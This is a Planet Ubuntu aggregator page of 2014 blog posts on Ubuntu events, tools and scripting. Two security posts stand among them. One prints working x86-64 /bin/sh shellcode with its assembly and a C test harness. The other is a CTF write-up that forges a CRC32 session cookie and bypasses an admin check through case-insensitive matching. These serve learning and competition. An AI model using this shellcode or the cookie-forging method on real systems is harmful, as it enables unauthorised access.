news aggregator

José Antonio Rey: Need help rooting or flashing your Nexus device? The solution is here!

Planet Ubuntu - Thu, 2014-06-05 03:40

A couple days ago, Android 4.4.3 was released. I have a Nexus device, so I was waiting for the OTA update. I had the 4.4.2 update on the queue, though, so I decided to go ahead and apply it. But my recovery partition had the TeamWin Recovery installed, which didn’t like the upgrade. So, I asked a friend of mine and he ended up giving me a simple solution for my flashing and rooting problems: Nexulockr.

Nexulockr is a program written by Ian Santopietro, which makes the task of managing your Nexus device (in terms of the previously mentioned stuff) way too easy. So, I went ahead and downloaded the Android 4.4.3 factory image for my device, and patiently waited. Well, I couldn’t expect to download it quickly with this 400 KB/s connection. While I did, the new Nexulockr version finished uploading, and I was getting ready to add the PPA to my machine. Doing it is as simple as executing the following commands:

sudo add-apt-repository ppa:nexulockr-dev/nexulockr-beta
sudo apt-get update
sudo apt-get install nexulockr

That, after another bit of waiting, installed Nexulockr into my machine. And I was ready to go! I opened the program and this magic screen appeared (with all my device info, of course):

The process of flashing the image was super quick and easy. I just clicked on the right button, and this other window appeared:

In the factory image I downloaded, I got lots of .img files compressed into one gzip. Problem is, sometimes you don’t know what image to flash first or last. Nexulockr solves this problem by having the buttons in the order the images need to be flashed. I went ahead and started flashing the images. No additional efforts were needed on my side, just selecting the image and clicking that automagic button while my phone was connected.

The next day, I found out my root had disappeared (for obvious reasons), so I had to root my phone again. Guess what – Nexulockr also helped me with that. I went ahead, connected my phone, and clicked the “Root” button. I selected “Root device” and I just had to do one press on my phone to confirm the root. And that was it. No tedious command line interaction!

The developer states that Nexulockr may work with some other devices, but this is not guaranteed. Still, for all those of you with Nexus devices, this may come in handy at some point. As I am writing this, a build for the beta package is ongoing. So, why not give it a try after it’s done?


Fumihito YOSHIDA: Ubuntu 14.04 LTS release party + Offline meeting 14.04 Tokyo

Planet Ubuntu - Thu, 2014-06-05 03:11
A few weeks ago, Ubuntu Japanese Team convene "Ubuntu 14.04 LTS release party + Offline meeting 14.04" with co-sponsored by GREE, Inc and around 100 attendances. That event combine the hackathon and seminar sessions, we have it both ways.

Virtual tour:
1) A lot of sandwitchs (for 100 enlister) and party dishes.


Note: These represent just the tip of the iceberg. But, they completely-disappeared within 20 minutes....:)


2) A lot of Ubuntu 14.04 LTS CDs (From LoCo kit, thanks Canonical!) with *pretty* stuffed Tahr and Unicorn (owner: Shibata Mitsuya).






3) Terazono Junya with LipoD(Lipovitan D, Japanese popular energy drink).
 


4) Large screen (very nice, thanks GREE!)



5) Retrospective by Jun. Ubuntu Japanese Team create "Ubuntu Japanese Remix" for a long time (about 8years), He is great leader.




6) Seminar by Tokura Aya (Microsoft). She is evangelist/image character of Microsoft Azure/Cloud in Japan.
 



7) Seminar by Shiobara Hiroaki(GMO Internet). He escort "Mikumo-Conoha", the macot fay of "ConoHa" (CMO's Cloud service). 
 

8) Seminar by Yokota Masatoshi(Sakura Internet), He and Mr. Shiobara starts a verbal battle like Wrestling Entertainment (Its entertainment. They keep friendliness and respets, but thats engage in a heated debate. I Know, they give the right hand of fellowship after sessions. :) ).



One of sessions theme are "Retrospective", overview for 10 years of ubuntu.

- "Ubuntu and Me, a certain ubuntu user's voice" by Terazono Junya (indivisual, but he is famous planetary informatics scientist, a.k.a. "Hayabusa project's PR expert with LipoD" ).
- "Retrospective last 10 years" by Kobayashi Jun (Ubuntu Japanese Team)

Another seminar sessions focused "VPS and Cloud production environment with Ubuntu", line-up as follows.

- "Ubuntu + Microsoft Azure, Quickguide before a you use Azure"  by Tokura Aya, a.k.a. "Cloudia Madobe" (Microsoft Corporation).
- "Ubuntu on Microsoft Azure" by Tsumura Akira (Japan Azure User Group)
- "GMO Cloud with Ubuntu 14.04" by Shiobara Hiroaki (GMO Internet)
- "Using Ubuntu on Sakura's VPS/Cloud" by Yokota Masatoshi (Sakura Internet)
- "Using Juju for your Ubuntu environment" by Matsumoto Takenori (Canonical)

Yes, they are awesome presenters(thanks!), they distribute Ubuntu environment as a Cloud/VPS operator. We can use Ubuntu on there VPS/Cloud service with your one-click operation. Excellent!


And, You can check an another report on gihyo.jp (http://gihyo.jp/admin/serial/01/ubuntu-recipe/0325) by Terauchi Yasuyuki (in Japanese), that sponsored by GIHYO.

In closing, I would like to thank you all for convention. Thanks a lot!

David Tomaschik: Minimal x86-64 shellcode for /bin/sh?

Planet Ubuntu - Thu, 2014-06-05 01:54

I was trying to figure out the minimal shellcode necessary to launch /bin/sh from a 64-bit processor, and the smallest I could come up with is 25 bytes: \x48\xbb\xd1\x9d\x96\x91\xd0\x8c\x97\xff\x48\xf7\xdb\x53\x31\xc0\x99\x31\xf6\x54\x5f\xb0\x3b\x0f\x05.

This was produced from the following source:

BITS 64 main: mov rbx, 0xFF978CD091969DD1 neg rbx push rbx xor eax, eax cdq xor esi, esi push rsp pop rdi mov al, 0x3b ; sys_execve syscall

Compile with nasm, examine the output with objdump -M intel -b binary -m i386:x86-64 -D shellcode.

Here's a program for testing:

#include <sys/mman.h> #include <stdint.h> char code[] = "\x48\xbb\xd1\x9d\x96\x91\xd0\x8c\x97\xff\x48\xf7\xdb\x53\x31\xc0\x99\x31\xf6\x54\x5f\xb0\x3b\x0f\x05"; int main(){ mprotect((void *)((uint64_t)code & ~4095), 4096, PROT_READ|PROT_EXEC); (*(void(*)()) code)(); return 0; }

I'd like to find a good tool to compile my shellcode, extract as hex, build a test bin, and run it, all in one. Should be a trivial python script, actually.

Daniel Pocock: Trialing the xTuple/PostBooks next generation web UI

Planet Ubuntu - Wed, 2014-06-04 20:35

For some time I've been using PostBooks to keep track of finances. The traditional PostBooks system has a powerful Qt GUI.

The xTuple team have been hard at work creating a shiny new web-based user interface.

The traditional UI has no dedicated server - all users communicate directly with the PostgreSQL database where stored procedures and triggers ensure the correct logic is applied.

The new model provides an xTuple application server that can handle requests from web users and potentially other third-party apps too.

Who is it for?

Some people may feel that the web UI is intended to appeal to mobile users. While it is useful for mobile and tablet devices, this is not strictly the aim, John has discussed this in a blog.

One benefit of the web UI is that accountants and book-keepers do not need to have a copy of every exact PostBooks version that every client is using. Given that many people only need their accountant to look at their books for just a few hours at the end of each year, the ease of access with a web UI will make a big difference.

Trying it out quickly

The xTuple Git repository provides a script to install the whole server quickly. Initially it just supported a single Ubuntu release, I just contributed some tweaks to generalize it for Debian wheezy and potentially other releases. It doesn't appear too difficult to generalize it further for Fedora or RHEL users.

To get going, I recommend trying it in a fresh virtual machine, either in a server environment or desktop VirtualBox solution. The installation script will install various packages on the machine and mess about with the PostgreSQL setup so you will not want to run the automated setup script on any machine where you have existing databases.

Once the virtual machine is setup, make sure sudo is installed and configured:


# apt-get install sudo
# visudo

and then run the install as your normal user:


git clone --recursive git://github.com/xtuple/xtuple.git
cd xtuple
git remote add XTUPLE git://github.com/xtuple/xtuple.git
git fetch XTUPLE
git checkout `git describe --abbrev=0`
chmod a+x scripts/install_xtuple.sh
scripts/install_xtuple.sh

If all goes well, 5-10 minutes later it is ready to run:


cd node-datasource
node main.js

The port numbers will appear on the screen and you can connect with a web browser.

Trying it out

Despite my comments above to the effect that this is not primarily aimed at mobile, the first and second device I tested with were both mobile devices, Samsung Galaxy S3 and a Samsung Galaxy Note 3. I feel the Note is far better for this type of application, primarily due to screen size and the fact that most of the forms in the application have fields that launch popup menus. It appears to work in both Chrome and Firefox on these devices.

One handy feature is that the mobile device can dial numbers directly from the CRM address book, this is facilitated with the tel URI.

My impression is that this is still a product that is in the final stages of development, although some people will be able to use it almost immediately. One significant thing to note is that the database schema is very stable due to the long history of the traditional xTuple/PostBooks products.

The Fridge: Alternate Meeting Channel

Planet Ubuntu - Wed, 2014-06-04 20:24

Over the past several years the Ubuntu community has grown to encompass projects that range a variety of teams that work on everything from tablets to servers.

We’ve recently been seeing an increase in meeting time collisions among teams, so we’ve decided to go ahead and open an alternate meeting channel called #ubuntu-meeting-2 where teams can host their meetings if a meeting is already happening in #ubuntu-meeting during the time they want to host their own meeting. The Ubuntu Technical Board was the first to have their meeting on the schedule for this new channel!

If your team wants to have their meetings scheduled in our meetings ground, please let us know by dropping an email to ubuntu-news-team@lists.ubuntu.com or contacting us on IRC at #ubuntu-news on irc.freenode.net (click here to join from your browser).

Aurélien Gâteau: A template for shell-based command-line scripts

Planet Ubuntu - Wed, 2014-06-04 16:54

If you write shell scripts, you may be familiar with the situation where you wrote a script, and now would like to extend it to add some optional argument. Said script being a temporary hack (as temporary as those tend to be...) you end up writing a quick'n'dirty command-line parser, suffering limitations like fixed argument orders or other things which make tools annoying to use, but which would take too much time to get right than would be worth for this tiny shell script.

I felt this annoyance many times while writing scripts. To avoid that situation, I used to have a template which made use of the getopt binary but I always found it cumbersome: annoying to work with and hard to read again when coming back to my code after a while. Recently I came up with a simpler, slightly more manual, alternative.

The whole template looks like this:

#!/bin/sh set -e PROGNAME=$(basename $0) die() { echo "$PROGNAME: $*" >&2 exit 1 } usage() { if [ "$*" != "" ] ; then echo "Error: $*" fi cat << EOF Usage: $PROGNAME [OPTION ...] [foo] [bar] <Program description>. Options: -h, --help display this usage message and exit -d, --delete delete things -o, --output [FILE] write output to file EOF exit 1 } foo="" bar="" delete=0 output="-" while [ $# -gt 0 ] ; do case "$1" in -h|--help) usage ;; -d|--delete) delete=1 ;; -o|--output) output="$2" shift ;; -*) usage "Unknown option '$1'" ;; *) if [ -z "$foo" ] ; then foo="$1" elif [ -z "$bar" ] ; then bar="$1" else usage "Too many arguments" fi ;; esac shift done if [ -z "$bar" ] ; then usage "Not enough arguments" fi cat <<EOF foo=$foo bar=$bar delete=$delete output=$output EOF

Note: the die function is not used by the template itself, but most of the scripts I write needs such a function at some point, which is why it is there.

This template supports:

  • Short and long options (-d and --delete for example)
  • Options with and without arguments
  • Arbitrary position for options: myscript foo -d will do the same as myscript -d foo
  • Aborting when invalid options are passed
  • Checks for mandatory positional arguments

This last feature is done in two parts. First the *) case in the while loop sets variables as it goes through arguments and aborts if too many arguments are passed. Once the code leaves the while loop, a check is done on the last argument: if it is empty the code aborts complaining about missing arguments.

Supporting a variable number of arguments

A common change is accepting a variable number of arguments. If you are confident your arguments will never contain spaces or other weird characters, then you can do the following changes:

  1. Declare an empty args variable before the while loop:

    args=""
  2. Replace the code in the *) case with something like this:

    *) args="$args $1" ;;
  3. Remove the check for the last argument or alter it to check if args is empty.

  4. Iterate over the arguments with:

    for arg in $args ; do # Do work here done

If you want to support arguments which contain spaces, that's another story. The simplest solution I know of is to make use of Bash arrays. The changes would thus look like this:

  1. Change the shebang to #!/bin/bash.

  2. Declare an empty args array before the while loop:

    args=()
  3. Replace the code in the *) case with something like this:

    *) args=(${args[@]} "$1") ;;
  4. Same as before: remove the check for the last argument or alter it to check if args is empty.

  5. Iterate over the arguments with:

    for arg in ${args[@]} ; do # Do work here done

Higher percentage of cabalistic symbols in there, but that's the price one has to pay to manipulate arrays with Bash.

Pros and cons

Compared to getopt, this template has a few advantages but also limitations one must be aware of:

  • Pros
    • No need to list the options again in a call to getopt
    • Less boilerplate: getopt requires you to run it, then eval its output
    • Positional arguments are handled in the same loop which handles the options
  • Cons
    • No support for concatenated short options: -ab is not the same as -a -b.
    • No support for separating option arguments with an equal sign: you must write --output file.log and not --output=file.log.

That's it for this template, hope it is useful to you.

Jorge Castro: Juju is now on Github

Planet Ubuntu - Wed, 2014-06-04 13:55

We’ve got some changes in Juju and the Juju ecosystem that have been landing this week.

Ian Booth announced the move of Juju core to github.com. You can find all our work at: https://github.com/juju.

Workflow instructions for contributing are available in the CONTRIBUTING file. Ian also adds:

Once the dust settles on the migration of juju-core, we’ll also be migrating various dependencies like goose, gwacl, gomaasapi and golxc.

You can find the code for Juju Core at: https://github.com/juju/juju

On a related note, we have a one way mirror of the Juju Charm Store as well: https://github.com/charms

You can combine these with Francesco Banconi’s git-deploy plugin to deploy right from github, as an example:

juju git-deploy charms/mysql

Hopefully 2-way syncing will be possible soon, stay tuned!

David Murphy: Enabling Students in a Digital Age: Charlie Reisinger at TEDxLancaster

Planet Ubuntu - Wed, 2014-06-04 13:44

This is really inspiring to me, on several levels: as an Ubuntu member, as a Canonical, and as a school governor.

Not only are they deploying Ubuntu and other open-source software to their students, they are encouraging those students to tinker with their laptops, and – better yet – some of those same students are directly involved in the development, distribution, and providing support for their peers. All of those students will take incredibly valuable experience with them into their future careers.

Well done.

The post Enabling Students in a Digital Age: Charlie Reisinger at TEDxLancaster appeared first on David Murphy.

David Tomaschik: Secuinside Quals 2014: Simple Login

Planet Ubuntu - Wed, 2014-06-04 02:08

In this challenge, we received the source for a site with a pretty basic login functionality. Aside from some boring forms, javascript, and css, we have this PHP library for handling the session management:

1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50<? class common{ public function getidx($id){ $id = mysql_real_escape_string($id); $info = mysql_fetch_array(mysql_query("select idx from member where id='".$id."'")); return $info[0]; } public function getpasswd($id){ $id = mysql_real_escape_string($id); $info = mysql_fetch_array(mysql_query("select password from member where id='".$id."'")); return $info[0]; } public function islogin(){ if( preg_match("/[^0-9A-Za-z]/", $_COOKIE['user_name']) ){ exit("cannot be used Special character"); } if( $_COOKIE['user_name'] == "admin" ) return 0; $salt = file_get_contents("../../long_salt.txt"); if( hash('crc32',$salt.'|'.(int)$_COOKIE['login_time'].'|'.$_COOKIE['user_name']) == $_COOKIE['hash'] ){ return 1; } return 0; } public function autologin(){ } public function isadmin(){ if( $this->getidx($_COOKIE['user_name']) == 1){ return 1; } return 0; } public function insertmember($id, $password){ $id = mysql_real_escape_string($id); mysql_query("insert into member(id, password) values('".$id."', '".$password."')") or die(); return 1; } } ?>

Some first impressions:

  • MySQL calls seem to be properly escaped.
  • The auth cookie is using the super-weak crc32.
  • Setting the user_name cookie to 'admin' won't work out for us.

In index.php, we see:

1 2 3if($common->islogin()){ if($common->isadmin()) $f = "Flag is : ".__FLAG__; else $f = "Hello, Guest!";

So, presumably, the correct user is actually 'admin', but we can't log in as that. So what to do? Well, after playing around for a bit, I realized one important point. By default, MySQL uses case-insensitive string comparisons but, of course, PHP's == operator is case-sensitive. So a mixed-case version of admin will pass the test in islogin() but will return the user we want in getidx(), but we can't log in as any variation of admin as the password will still be needed.

That brings us to the hash. Perhaps we could fake the hash for an uppercased admin user? While we could probably brute force the salt, that would take a while. However, crc32 is vulnerable to trivial hash length extension attacks, if you can set the internal state to an existing hash. That is: crc32(a+b) == crc32(b, crc32(a)). So, since the salt is at the beginning, if we have the crc32 for a user, we can easily concatenate anything on the end and still generate a valid hash. (Assuming an implementation of crc32 that allows you to set the existing internal state.)

One rub: while python allows you to set the state, it doesn't implement the same CRC-32 as PHP! (I thought there was only one CRC-32, but apparently the one in python's binascii and zlib modules is the zlib CRC-32, and the PHP hash one is the bz2 CRC-32.) So I was able to find the relevant lookup table for the BZ2 crc-32 and write this implementation:

1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18import struct crc_table = [ 0x00000000L, 0x04c11db7L, 0x09823b6eL, 0x0d4326d9L, ...snip... 0xbcb4666dL, 0xb8757bdaL, 0xb5365d03L, 0xb1f740b4L ] def bzcrc(s, init=None): if init: state = struct.unpack('>I', struct.pack('<I', ~init & 0xffffffff))[0] else: state = 0xffffffff for c in s: state = state & 0xffffffff state = ((state << 8) ^ (crc_table[(state >> 24) ^ (ord(c))])) return hex(struct.unpack('>I', struct.pack('<I', ~state & 0xffffffff))[0])

And yes, I do some weird stuff with byte-order swapping, but it works for the one off. So, we logged in as the user 'a', got a hash, then changed the user_name cookie to aDMIN, and calculated the new hash via: bzcrc('DMIN', <existing hash>). Updated the hash cookie, refresh, and we've got a flag.

Pages

Subscribe to Free Software Magazine aggregator